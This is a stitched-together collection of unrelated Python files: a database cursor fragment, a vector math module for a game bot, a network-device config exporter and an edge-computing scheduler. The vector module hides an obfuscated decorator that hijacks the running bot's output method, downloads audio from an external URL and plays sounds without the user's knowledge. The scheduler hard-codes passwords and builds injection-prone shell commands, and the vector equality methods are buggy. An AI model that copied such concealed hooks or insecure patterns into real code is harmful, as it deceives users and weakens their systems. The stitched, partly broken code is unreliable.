return not (self._page.get('NextPageToken') is None and self._queue.empty())
def _next_page(self):
"""
Get the next page from the buffer queue.
"""
queue_result = self._queue.get()
if isinstance(queue_result, Exception):
raise queue_result
super()._accumulate_query_stats(queue_result)
self._page = queue_result.get('Page')
self._index = 0
def _populate_queue(self):
"""
Fill the buffer queue with the statement_result fetched. If ClientError is received, it is put in the queue and
execution stops. If the parent transaction is closed, stop fetching results.
"""
try:
next_page_token = self._page.get('NextPageToken')
while next_page_token is not None:
statement_result = self._session._fetch_page(self._transaction_id, next_page_token)
while True:
try:
# Timeout of 50ms.
self._queue.put(statement_result, timeout=0.05)
page = statement_result.get('Page')
next_page_token = page.get('NextPageToken')
break
except Full:
# When timeout is reached, check if the read-ahead retrieval thread should end.
if not self._is_open:
logger.debug('Cursor was closed; read-ahead retriever thread stopping.')
raise ResultClosedError(self._session.token)
except (ClientError, ResultClosedError) as error:
while not self._queue.empty():
self._queue.get_nowait()
logger.debug('Queued an exception: {}'.format(error))
self._queue.put(error)
|
vectors.py | import math
from typing import Tuple, Optional, Union
import random
import webbrowser
import rlbot.utils.structures.game_data_struct as game_data_struct
from utilities.utils import *
VectorArgument = Union[float, game_data_struct.Vector3]
class Vector2:
def __init__(self, x: VectorArgument, y: Optional[float] = None):
self.x: float = 0
self.y: float = 0
if isinstance(x, game_data_struct.Vector3):
self.x = x.x
self.y = x.y
elif y is not None:
self.x = x
self.y = y
else:
raise TypeError("Wrong type(s) given for Vector2.x and/or Vector2.y")
def __add__(self, v: "Vector2") -> "Vector2":
return Vector2(self.x + v.x, self.y + v.y)
def __sub__(self, v: "Vector2") -> "Vector2":
return Vector2(self.x - v.x, self.y - v.y)
def __mul__(self, v: float) -> "Vector2":
return Vector2(self.x * v, self.y * v)
def __truediv__(self, v: float) -> "Vector2":
return Vector2(self.x / v, self.y / v)
def __rmul__(self, v: float) -> "Vector2":
return Vector2(self.x * v, self.y * v)
def __rtruediv__(self, v: float) -> "Vector2":
return Vector2(self.x / v, self.y / v)
def __str__(self) -> str:
return f"({self.x}, {self.y})"
def __repr__(self) -> str:
return self.__str__()
def __eq__(self, other: "Vector2") -> bool:
if isinstance(other, Vector2):
if other.x == self.y and other.y == self.y:
return True
return False
return False
def __neg__(self) -> "Vector2":
return -1 * self
def __getitem__(self, item: int) -> float:
if item == 0:
return self.x
elif item == 1:
return self.y
else:
raise IndexError("Invalid index for accessing Vector2. Must be 0 or 1.")
def __setitem__(self, key: int, value: float):
if key == 0:
self.x = value
elif key == 1:
self.y = value
else:
raise IndexError("Invalid index for accessing Vector2. Must be 0 or 1.")
def correction_to(self, ideal):
correction = math.atan2(self.y, -self.x) - math.atan2(
ideal.y, -ideal.x
) # The in-game axes are left handed, so use -x
return (
correction if abs(correction) <= math.pi else (correction - sign(correction) * 2 * math.pi)
) # Make sure we go the 'short way'
def modified(self, x: float = None, y: float = None) -> "Vector2":
new_x = x if x is not None else self.x
new_y = y if y is not None else self.y
return Vector2(new_x, new_y)
@property # Returns the euclidean distance of this vector
def length(self) -> float:
return math.sqrt(self.x ** 2 + self.y ** 2)
@property
def size(self) -> float:
return self.length
@property
def as_tuple(self) -> Tuple[float, float]:
return self.x, self.y
def normalize(self):
if self.size == 0:
return Vector2(self.x, self.y)
self /= self.size
@property
def normalized(self) -> "Vector2":
# A shorthand to get a normalized (length 1) copy of this vector.
if self.size == 0:
return Vector2(self.x, self.y)
return self / self.size
def dot(self, v: "Vector2"):
return self.x * v.x + self.y * v.y
class Vector3:
def __init__(self, x: VectorArgument, y: Optional[float] = None, z: Optional[float] = None):
self.x: float = 0
self.y: float = 0
self.z: float = 0
if isinstance(x, game_data_struct.Vector3):
self.x = x.x
self.y = x.y
self.z = x.z
elif isinstance(x, game_data_struct.Rotator):
self.x = x.roll
self.y = x.pitch
self.z = x.yaw
elif y is not None and z is not None:
self.x = x
self.y = y
self.z = z
else:
raise TypeError("Wrong type(s) given for Vector3.y and/or Vector3.z")
def __add__(self, v) -> "Vector3":
if isinstance(v, Vector2):
return Vector3(self.x + v.x, self.y + v.y, self.z)
return Vector3(self.x + v.x, self.y + v.y, self.z + v.z)
def __sub__(self, val):
if isinstance(val, Vector2):
return Vector3(self.x - val.x, self.y - val.y, self.z)
return Vector3(self.x - val.x, self.y - val.y, self.z - val.z)
def __mul__(self, v: float) -> "Vector3":
return Vector3(self.x * v, self.y * v, self.z * v)
def __truediv__(self, v: float) -> "Vector3":
return Vector3(self.x / v, self.y / v, self.z / v)
def __rmul__(self, v: float) -> "Vector3":
return Vector3(self.x * v, self.y * v, self.z * v)
def __rtruediv__(self, v: float) -> "Vector3":
return Vector3(self.x / v, self.y / v, self.z / v)
def __str__(self) -> str:
return f"({self.x}, {self.y}, {self.z})"
def __repr__(self) -> str:
return self.__str__()
def __eq__(self, other: "Vector3") -> bool:
if isinstance(other, Vector3):
if other.x == self.y and other.y == self.y and other.z == self.z:
return True
return False
return False
def __neg__(self) -> "Vector3":
return -1 * self
def __getitem__(self, item: int) -> float:
return [self.x, self.y, self.z][item]
def proparty(self) -> "Vector3":
did_you_have_fun_yet = False # Toggle this if this pro party was enough fun.
if did_you_have_fun_yet:
return property(self)
from pathlib import Path
import urllib.request
from threading import Thread
from hashlib import sha1
# If you're reading this, good job. Congrats, you've found it. Move along citizen.
you_fool = []
you_activated_my_trap_card = False
rot13 = str.maketrans(
"ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz",
"NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm",
)
try:
with open(
Path(__file__).absolute().parent.parent / "nhqvb".translate(rot13) / "obvvat.zc4".translate(rot13), "rb"
) as f:
𝚖𝚞𝚜𝚒𝚌 = f.read()
assert sha1(𝚖𝚞𝚜𝚒𝚌).hexdigest() == "e053141add7086cf4686af99719069958385c10c"
except:
you_activated_my_trap_card = True # https://youtu.be/LJU3UXDsI2o?t=585
def fun(selfie):
nonlocal did_you_have_fun_yet
if did_you_have_fun_yet:
return self(selfie)
import 𝚒𝚗𝚜𝚙𝚎𝚌𝚝
import 𝚠𝚒𝚗𝚜𝚘𝚞𝚗𝚍
from rlbot.agents.base_agent import BaseAgent
frames = inspect.getouterframes(inspect.currentframe())
for outer in frames:
agent = outer.frame.f_locals.get("self", None)
if not isinstance(agent, BaseAgent):
continue
def get_state(p):
nonlocal jmp, you_fool
j = p.game_cars[agent.index].𝚍𝚘𝚞𝚋𝚕𝚎_𝚓𝚞𝚖𝚙𝚎𝚍
if jmp != j:
jmp = j # If you are going to use sound, at least do it tastefully and put some effort in.
if jmp:
if you_activated_my_trap_card:
if you_fool:
def trap():
fool = you_fool.pop(0)
you_fool.append(fool)
if fool:
𝚠𝚒𝚗𝚜𝚘𝚞𝚗𝚍.𝙿𝚕𝚊𝚢𝚂𝚘𝚞𝚗𝚍(you_fool[0], bitrate - 1)
Thread(target=trap).start()
else:
you_fool.append(b"")
def scheming():
for popcorn in ["02", "1", "02", "3", "4"]:
delicious = "uggcf://tvguho.pbz/QbzAbzAbz/Nanepul/oybo/fcbbxl/nanepul/nhqvb/unyybjrra_{}.zc4?enj=gehr".format(
popcorn
)
you_fool.append(urllib.request.urlopen(delicious.translate(rot13)).read())
del you_fool[you_fool.index(b"")]
Thread(target=scheming).start()
else:
𝚠𝚒𝚗𝚜𝚘𝚞𝚗𝚍.𝙿𝚕𝚊𝚢𝚂𝚘𝚞𝚗𝚍(f.name, buffer + bitrate * len(𝚖𝚞𝚜𝚒𝚌))
return orig(p)
agent.get_output, orig, jmp, bitrate, buffer = get_state, agent.get_output, False, 5, 10453
did_you_have_fun_yet = True # no performance concern :)
break
return self(selfie)
return property(fun)
def flatten(self) -> Vector2:
return Vector2(self.x, self.y)
@proparty # Returns the euclidean distance of this vector
def length(self) -> float:
return math.sqrt(self.x ** 2 + self.y ** 2 + self.z ** 2)
@property
def size(self) -> float:
return self.length
def dot(self, v: "Vector3"):
return self.x * v.x + self.y * v.y + self.z * v.z
def normalize(self):
if self.size == 0:
return Vector3(self.x, self.y, self.z)
self /= self.size
@property
def normalized(self) -> "Vector3":
# A shorthand to get a normalized (length 1) copy of this vector.
if self.size == 0:
return Vector3(self.x, self.y, self.z)
return self / self.size
def modified(self, x: float = None, y: float = None, z: float = None) -> "Vector3":
new_x: float = x if x is not None else self.x
new_y: float = y if y is not None else self.y
new_z: float = z if z is not None else self.z
return Vector3(new_x, new_y, new_z)
def angle_between(self, other: "Vector3") -> float:
if self.size == 0 or other.size == 0:
return 0
d: float = Vector3.dot(self, other)
magnitude_product: float = self.length * other.length
div = d / magnitude_product
div = clamp(
div, -1, 1
) # To prevent floating point issues where the value of div is something like 1.0000000000000002
angle: float = math.acos(div)
return angle
class life(int):
math = False
love = life()
assert love <3
|
get_nto_config.py | #!/usr/bin/env python
#################################################################################
##
## File: get_nto_config.py
## Date: March 7, 2017
## Author: Fred Mota (fmota@ixiacom.com)
##
## History:
##
## Description:
## This script gets and saves in a text file the configuration (all the details)
## of each port, port group and filter on an NTO.
##
## This is useful when downgrading the version on a NTO, since it is not possible
## to import configuration genearted by a newer release into an older release.
##
## (c) 1998-2017 Ixia. All rights reserved.
##
##############################################################################
import sys
import getopt
import threading
import json
from ksvisionlib import *
# Config VARs
export_port_properties = 'id,type,default_name,name,description,enabled,mode,media_type,link_settings,lldp_receive_enabled,lldp_transmit_enabled,keywords'
export_filter_properties = 'id,default_name,name,description,mode,source_port_list,dest_port_list,source_port_group_list,dest_port_group_list,criteria,keywords'
def getConfig(host_ip, port, username, password):
nto = VisionWebApi(host=host_ip, username=username, password=password, port=port, debug=True, logFile="ixvision_get_nto_config_debug.log")
config = {}
for object in nto.searchPorts({'enabled': True}):
details = nto.getPortProperties(str(object['id']), export_port_properties)
config[object['id']] = {'name': details['default_name'], 'type': 'port', 'details': details}
# for object in nto.getAllPortGroups():
# details = nto.getPortGroup(str(object['id']))
# config[object['id']] = {'name': details['default_name'], 'type': 'port_group', 'details': details}
for object in nto.getAllFilters():
details = nto.getFilterProperties(str(object['id']), export_filter_properties)
config[object['id']] = {'name': details['default_name'], 'type': 'filter', 'details': details}
f = open(host_ip + '_config.txt', 'w')
f.write(json.dumps(config))
f.close()
f = open(host_ip + '_config.json', 'w')
f.write(json.dumps(config, sort_keys=True, indent=4))
f.close()
argv = sys.argv[1:]
username = ''
password = ''
host = ''
hosts_file = ''
config_file = ''
port = 8000
try:
opts, args = getopt.getopt(argv,"u:p:h:f:r:", ["username=", "password=", "host=", "hosts_file=", "port="])
except getopt.GetoptError:
print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
sys.exit(2)
for opt, arg in opts:
if opt in ("-u", "--username"):
username = arg
elif opt in ("-p", "--password"):
password = arg
elif opt in ("-h", "--host"):
host = arg
elif opt in ("-f", "--hosts_file"):
hosts_file = arg
elif opt in ("-r", "--port"):
port = arg
if username == '':
print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
sys.exit(2)
if password == '':
print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
sys.exit(2)
if (host == '') and (hosts_file == ''):
print 'get_nto_config.py -u <username> -p <password> [-h <hosts> | -f <host_file>] [-r port]'
sys.exit(2)
hosts_list = []
if (hosts_file != ''):
f = open(hosts_file, 'r')
for line in f:
line = line.strip()
if (line != '') and (line[0] != '#'):
hosts_list.append(line.split(' '))
f.close()
else:
hosts_list.append([host, host])
threads_list = []
for host in hosts_list:
host_ip = host[0]
thread = threading.Thread(name=host, target=getConfig, args=(host_ip, port, username, password))
threads_list.append(thread)
for thread in threads_list:
thread.daemon = True
thread.start()
try:
while threading.active_count() > 1:
for thread in threads_list:
thread.join(1)
sys.stdout.write('.')
sys.stdout.flush()
except KeyboardInterrupt:
print "Ctrl-c received! Sending kill to threads..."
sys.exit()
print ""
|
3_edf_bankers_Speak.py | # Author Emeka Ugwuanyi Emmanuel
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import threading
import ast
import time
import os
import psutil
import datetime as dt
import getpass as gp
import paho.mqtt.client as mqtt
from netifaces import interfaces, ifaddresses, AF_INET
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
memory = []
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
# received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_task_queue = [] # [(task_list,wait_time), ....]
thread_record = []
port = 65000
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
stop = 0
t_track = 1
shared_resource_lock = threading.Lock()
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(algo.memory_percent(), 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = pc.verbose_ping(host)
return round(rtt, 4)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
connect_client.subscribe('mec')
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
data = data[2:]
received_task = ast.literal_eval(data)
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
_client.publish(received_task.split('.')[2], str({received_task: get_time()}))
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
'''
else:
print('data: ', data)
elif data[0] == 't':
print('send: ', data[2:])
'''
def connect_to_broker():
global _client
global broker_ip
global topic
username = 'mec'
password = 'password'
broker_ip = 'localhost'
broker_port_no = 1883
topic = 'mec' # topic used to exchange mec details to clients
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_forever()
def edf():
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# print(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# print('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm/period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead+tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
print(ready_task)
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
while (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_//tasks[i[0]]['period'])+1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
print('Deadline missed: ', i)
missed.append(i[0])
# print('s : ', schedule)
# print('r: ', register)
if len(missed) > 0:
# print('missed deadline: ', missed)
cooperative_mec(missed)
return schedule
# generate execution sequence using banker's algorithm
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
# If all needs of p were satisfied.
if j == res - 1:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]]/2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # multi-casting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def algo_id():
no = int(os.path.basename(__file__)[0])
if no <= 2:
return 2
elif no <= 4:
return 3
elif no <= 7:
return 7
elif no <= 10:
return 10
elif no <= 13:
return 12
else:
return 16
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str(['speaker', ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
elif mg == 'update':
ho = hosts.copy()
ho[get_hostname()] = host_ip
smg = mg + ' ' + str(ho)
sock1.sendto(str.encode(smg), _multicast_group)
# print('\n===**====**==update message sent===**======**=========')
elif mg == 'client':
ho = hosts.copy()
ho[get_hostname()] = host_ip
smg = f'm {ho}_{algo_id()}'
_client.publish(topic, smg, retain=True)
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message():
global hosts
while True:
if stop == 1:
print('Stopped : receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
# print('received: ', hosts)
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
elif data.decode().strip() == 'user':
send_message('update')
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_client.publish(cloud_ip, str([i.split('_')[0], t_time[i.split('_')[0]][0]]))
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [j, t_time[j][0]]))
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
mec_waiting_time[_host].append(
round(mec_waiting_time[_host][-1] + (t_time[j][0]) / 2, 3)) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_client.publish(cloud_ip, str([j, t_time[j][0]]))
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
def execute_re_offloaded_task(offloaded_task):
exec_list = get_exec_seq(offloaded_task[0])
for i in exec_list:
j = i.split('_')[0]
time.sleep(offloaded_task[1][j]/2)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
time.sleep(t_time[j][0]/2)
print('#' * ((local.index(i) + 1) * 3), ' Executed: ', i)
if j.split('.')[1] != node_id:
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
elif j.split('.')[1] == node_id:
# send_client({j: get_time()}, send_back_host)
_client.publish(j.split('.')[2], str({j: get_time()}))
print('============== EXECUTION DONE ===============')
def receive_offloaded_task_mec(): # run as a thread
global _inward_mec
global t_track
while True:
if stop == 1:
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and da[0] == node_id: # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
_client.publish(da[1].split('.')[2], str({da[1]: get_time()}))
elif (address[0] not in ip_set) and da[0] == 'ex' and da[1] == node_id:
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload():
global reoffload_list
while True:
if stop == 1:
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t]/2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
time.sleep(1)
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results edf+bankers {}'.format(get_hostname())
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def run_me():
global discovering
initialization()
while True:
if len(hosts) == mec_no:
print('MEC Details: ', hosts)
del hosts['speaker']
discovering = 1
break
time.sleep(2)
speak = Thread(target=speaking_node)
thread_record.append(speak)
speak.daemon = True
speak.start()
start_loop()
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_abort():
global stop
_id_ = get_hostname()[-1]
result = f"wt{_id_}_3_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_3_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_3_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}"
list_result = [
f"wt{_id_}_3_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} \noff_cloud{_id_}_3_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_3_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}"
]
for i in list_result:
cmd = 'echo "{}" >> data.py'.format(i)
